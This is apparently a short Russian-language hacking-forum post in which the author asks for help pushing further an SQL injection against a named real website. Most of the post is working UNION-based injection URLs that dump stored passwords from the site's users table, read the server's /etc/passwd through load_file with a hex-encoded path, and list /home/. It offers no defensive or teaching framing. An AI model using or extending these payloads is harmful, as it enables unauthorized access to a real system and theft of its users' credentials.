может кто поможет и подскажет как раскрутить....
получен доступ к password а к login нет
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+aes_decrypt(aes_encry pt(group_concat(pwd,0x3a+SEPARATOR+0x0b),0x71),0x7 1),2,3,4,5+from+users--
решил использовать load_file('/etc/passwd')
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+load_file(0x2f6574632 f706173737764),2,3,4,5+from+users--
получил права на чтение файлов
/home/
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+load_file(0x2f686f6d6 52f),2,3,4,5+from+users--
а вот в дальнейших деррикториях я запутался